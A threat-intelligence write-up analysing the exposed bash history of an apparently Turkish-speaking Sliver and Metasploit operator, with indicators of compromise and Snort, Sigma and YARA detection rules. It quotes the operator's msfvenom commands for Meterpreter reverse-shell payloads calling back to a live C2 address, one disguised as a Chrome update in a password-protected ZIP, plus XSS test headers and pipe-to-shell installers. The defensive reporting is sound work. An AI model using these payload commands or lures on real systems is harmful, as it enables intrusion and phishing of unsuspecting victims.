high🤖Botnet

investigatedMarch 7, 2026publishedMarch 7, 2026

Anatomy of an Accidental OPSEC Burn: A Turkish Sliver C2 Operator Exposes Their Entire Attack Infrastructure via Python HTTP Server

#botnet#phishing#social-engineering#c2#apt#spearphishing

TL;DR: A Sliver C2 operator at 213.142.148.166 accidentally exposed their entire home directory -- including .bash_history, .sliver/ configs, and generated payloads -- by running python3 -m http.server 8080 from /root. Forensic analysis of the recovered bash history reveals a Turkish-speaking intermediate-skill operator running Sliver C2, Metasploit Framework, and attempted OpenClaw AI botnet deployments, with social engineering payloads disguised as Chrome updates and Windows patches.

How We Got Here: An Open Directory That Should Not Exist

The investigation began with an open directory finding on 213.142.148.166:8080. Rather than a deliberately staged file drop or a misconfigured web server, this exposure was caused by the oldest mistake in the book: running Python's built-in HTTP server from a privileged home directory.

python3 -m http.server 8080 --bind 0.0.0.0

Executed from /root, this single command served the operator's entire working environment to the public internet -- bash history, SSH configuration, Sliver C2 database, Metasploit payloads, and every tool they had installed. The operator even opened the firewall for it:

ufw allow 8080/tcp

The recovered artifacts paint a detailed picture of the operator's tooling, skill level, and intended targets.

Operator Profile

The bash history contains Turkish-language comments and file naming conventions that establish the operator's linguistic origin:

# DOĞRU DOSYA:          ("CORRECT FILE:")
# Terminalde ...         ("In the terminal...")
mv windows_kb5023789.zip kurulum.zip   # "kurulum" = "installation" in Turkish

The operator's skill level is intermediate at best. The history shows repeated failed attempts at basic tasks -- installing Sliver took at least four separate approaches (snap, apt, official script, manual binary download) before a working configuration was achieved. Port conflicts were resolved by brute-force kill -9 commands rather than systematic debugging. At one point, the operator attempted sudo kill -4098 PID, confusing a PID for a signal number.

Tool Stack: Sliver + Metasploit + OpenClaw

The operator deployed three distinct offensive frameworks on this server:

1. Sliver C2 (BishopFox)

Sliver was the primary C2 framework, though installation was a struggle. The history documents the full journey:

# Attempt 1: snap (failed)
sudo snap install sliver
snap run sliver        # doesn't work
snap run sliver-server # doesn't work
sudo snap remove sliver

# Attempt 2: official install script (failed - missing minisign)
curl https://sliver.sh/install | sudo bash

# Attempt 3: fix dependencies, retry script (unclear outcome)
apt install minisign -y
curl https://sliver.sh/install | sudo bash

# Attempt 4: manual binary download (success)
wget https://github.com/BishopFox/sliver/releases/download/v1.7.3/sliver-client_linux-amd64
chmod +x sliver-client_linux-amd64
sudo mv sliver-client_linux-amd64 /usr/local/bin/sliver-client

The operator eventually got the Sliver server running and configured it with:

gRPC listener on port 4443 (default Sliver server port)
Multiplayer port on 31337 (default)
Client config exported as /root/admin.cfg
Database backup at /root/.sliver_backup/

They also attempted to create a systemd service for persistence, but ultimately abandoned it in favor of running sliver-server daemon & in background:

sudo nano /etc/systemd/system/sliver.service
sudo systemctl daemon-reload
sudo systemctl start sliver
# ... later abandoned:
sudo systemctl stop sliver
sudo systemctl disable sliver
sudo rm /etc/systemd/system/sliver.service

The backup of the .sliver directory followed by wiping the database suggests the operator hit corruption or configuration issues and performed a fresh start:

cp -r /root/.sliver /root/.sliver_backup
rm -rf /root/.sliver/database/*
rm -rf /root/.sliver/configs/*
sliver-server

2. Metasploit Framework

Metasploit was installed via snap and used for payload generation:

sudo snap install metasploit-framework
sudo snap connect metasploit-framework:network-control :network-control

Three payloads were generated (detailed in the Payloads section below).

3. OpenClaw AI Botnet (Failed)

The operator made three separate attempts to deploy the OpenClaw AI botnet:

# Attempt 1: /home/cy/clawdbot/
curl -fsSL https://openclaw.ai/install.sh | bash

# Attempt 2: same directory (after reboot)
curl -fsSL https://openclaw.ai/install.sh | bash

# Attempt 3: /root/clawbot/
curl -fsSL https://openclaw.ai/install.sh | bash

Between attempts 1 and 2, the operator performed an extensive cleanup -- stopping services, removing binaries, purging npm global packages, and sweeping filesystem paths:

sudo systemctl stop openclaw 2>/dev/null || true
sudo systemctl disable openclaw 2>/dev/null || true
sudo find / -maxdepth 4 -type d \( -iname "*openclaw*" -o -iname "*claw*" \) 2>/dev/null
rm -rf /root/.openclaw
rm -rf /usr/lib/node_modules/openclaw
rm -rf /tmp/openclaw-0
rm -rf /tmp/openclaw

The cleanup sequence suggests the operator installed OpenClaw, didn't like what it did to their system, removed it, and then tried again. The tool appears to be a Node.js-based botnet framework with a local API server on port 18789:

curl http://localhost:18789/

All three attempts appear to have failed or been abandoned.

Payload Analysis

Three distinct Metasploit payloads were generated, showing an escalation in social engineering sophistication:

Payload 1: `payload.exe` -- Basic Meterpreter

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=213.142.148.166 LPORT=4444 -f exe -o payload.exe

A plain reverse TCP Meterpreter shell. No obfuscation, no pretense. This was likely a test payload.

Payload 2: `payload.msi` -- MSI Installer Format

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=213.142.148.166 LPORT=4444 -f msi -o payload.msi

Same payload in MSI format -- potentially to bypass execution policies that block .exe but allow .msi installer packages.

Payload 3: `chrome_update.exe` -- Social Engineering Lure

msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=213.142.148.166 LPORT=443 -f exe -o chrome_update.exe

This is the refined payload. Notable changes from the earlier versions:

HTTPS reverse shell on port 443 (blends with legitimate traffic)
Filename designed to impersonate a Chrome browser update
Password-protected ZIP for delivery, evading email gateway scanning:

zip --password "test" windows_kb5023789.zip chrome_update.exe
mv windows_kb5023789.zip kurulum.zip

The initial ZIP name windows_kb5023789.zip mimics a Windows KB update, which was then renamed to kurulum.zip ("installation.zip" in Turkish) -- suggesting the target audience is Turkish-speaking.

Reconnaissance Activity

The bash history reveals early-stage reconnaissance and XSS testing:

# Network sniffing
tcpdump -nn -i eth0 tcp and port 80
tcpdump -nn -i ens192 'tcp[tcpflags] & tcp-rst != 0'

# XSS testing against Google (testing technique, not targeting Google)
curl -v -H "User-Agent: test<script>" http://142.251.38.238
curl -H "User-Agent: test<script>alert(1)</script>" http://TARGET
curl -v -H "User-Agent: test<script>alert(1)</script>" http://google.com

The 142.251.38.238 IP resolves to Google infrastructure. The http://TARGET placeholder line was likely copied from a tutorial. This is not sophisticated XSS research -- it's someone learning reflected XSS from a guide and testing payloads against Google's front-end (which obviously sanitizes User-Agent headers).

Infrastructure Details

Server Environment

IP:        213.142.148.166
Services:  Sliver C2 (4443/tcp, 31337/tcp)
           Metasploit handler (4444/tcp, 443/tcp)
           Python HTTP server (8080/tcp)
Firewall:  UFW enabled, 8080/tcp explicitly allowed
Tools:     screen, tmux, htop, tcpdump, net-tools

The `known_hosts` Artifact

The recovered known_hosts file returned an HTTP 404 response rather than SSH host key data, indicating it was fetched through the Python HTTP server's directory listing but the actual ~/.ssh/known_hosts file did not exist at that path (or the .ssh directory was not being served). The authorized_keys file was similarly empty. This suggests the operator either used password authentication exclusively or had a non-standard SSH configuration.

Mysterious Artifacts

A few items in the history stand out without full context:

/root/fedora_ekrani.png ("fedora_screen.png") -- a screenshot the operator tried to view using eog and xdg-open, failing because there was no display server ($DISPLAY was unset). This is a headless VPS with no GUI.
/root/FLAT_CORMORANT -- a directory the operator briefly served on port 8000. "FLAT_CORMORANT" resembles a Sliver implant session name (Sliver uses ADJECTIVE_ANIMAL naming), suggesting this may have been a generated implant build directory.
autovm.sh and extend.sh in /home -- likely VPS provisioning scripts from the hosting provider.

MITRE ATT&CK Mapping

Technique	ID	Evidence
Command and Scripting Interpreter: Unix Shell	T1059.004	Extensive bash usage for tool installation, payload generation
Ingress Tool Transfer	T1105	`curl \| bash` install scripts, wget binary downloads
Application Layer Protocol: Web Protocols	T1071.001	Meterpreter reverse HTTPS on port 443
Masquerading: Match Legitimate Name or Location	T1036.005	`chrome_update.exe`, `windows_kb5023789.zip`
Archive Collected Data: Archive via Utility	T1560.001	Password-protected ZIP (`kurulum.zip`, password: `test`)
Exfiltration Over C2 Channel	T1041	Meterpreter reverse TCP/HTTPS channels
Non-Standard Port	T1571	Sliver C2 on 31337, Meterpreter on 4444
Remote Services: SSH	T1021.004	SSH daemon reconfigured (`sshd_config` edited)
Phishing: Spearphishing Attachment	T1566.001	Payload disguised as Chrome update in ZIP
System Service Discovery	T1007	`systemctl list-units`, `systemctl list-unit-files`

Operational Assessment

This operator is a real but unsophisticated threat. Key observations:

Low OPSEC discipline. Running python3 -m http.server from /root as a file serving mechanism exposed the entire attack infrastructure. The password on the ZIP file was test. The firewall was opened for the HTTP server. Every mistake that could be made, was made.
Tool-hopping indicates uncertainty. Three different C2/botnet frameworks (Sliver, Metasploit, OpenClaw) suggest the operator hasn't settled on a preferred toolset and is experimenting. The repeated failed installations reinforce this.
Social engineering is the likely delivery vector. The progression from payload.exe to chrome_update.exe inside kurulum.zip shows the operator is investing effort in lure quality. Turkish-language naming targets Turkish-speaking victims.
The infrastructure is still potentially active. The Sliver C2 daemon, Metasploit handlers, and the social engineering payloads all point to 213.142.148.166 as a live C2 callback address.

Indicators of Compromise

Network Indicators

Type	Value	Context
IPv4	`213.142.148.166`	C2 server, payload callback address
URL	`http://213.142.148.166:8080/`	Exposed open directory (Python HTTP server)
URL	`https://openclaw.ai/install.sh`	OpenClaw AI botnet installer
Port	`4443/tcp`	Sliver C2 gRPC listener
Port	`31337/tcp`	Sliver multiplayer listener
Port	`4444/tcp`	Meterpreter reverse TCP handler
Port	`443/tcp`	Meterpreter reverse HTTPS handler
Port	`8080/tcp`	Open directory file server

File Indicators

Filename	Description
`chrome_update.exe`	Meterpreter reverse HTTPS, LHOST=213.142.148.166, LPORT=443
`kurulum.zip`	Password-protected ZIP (password: `test`) containing `chrome_update.exe`
`windows_kb5023789.zip`	Original name of `kurulum.zip` before rename
`payload.exe`	Meterpreter reverse TCP, LHOST=213.142.148.166, LPORT=4444
`payload.msi`	Meterpreter reverse TCP (MSI format), same callback
`admin.cfg`	Sliver client operator config

Behavioral / Hunting Signatures

# Snort/Suricata: Outbound to known C2
alert tcp $HOME_NET any -> 213.142.148.166 [4443,4444,31337] (msg:"BREAKGLASS - Sliver/Meterpreter C2 callback to 213.142.148.166"; sid:2026030801; rev:1;)

# Sigma: kurulum.zip or chrome_update.exe on disk
title: Turkish Sliver Operator - Social Engineering Payload
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|endswith:
      - '\kurulum.zip'
      - '\chrome_update.exe'
      - '\windows_kb5023789.zip'
  condition: selection
level: high

# YARA: Meterpreter reverse HTTPS with this C2
rule meterpreter_reverse_https_213_142_148_166 {
  strings:
    $ip = "213.142.148.166"
    $ua = "Mozilla/5.0" // default Meterpreter UA
    $mz = { 4D 5A }
  condition:
    $mz at 0 and $ip and $ua
}

STIX 2.1 Bundle (abbreviated)

{
  "type": "indicator",
  "name": "Sliver C2 Operator - 213.142.148.166",
  "pattern": "[ipv4-addr:value = '213.142.148.166']",
  "pattern_type": "stix",
  "valid_from": "2026-03-08T00:00:00Z",
  "labels": ["malicious-activity", "c2"],
  "confidence": 90
}

Investigation by breakglass.intelligence. Raw artifacts recovered from open directory exposure at 213.142.148.166:8080.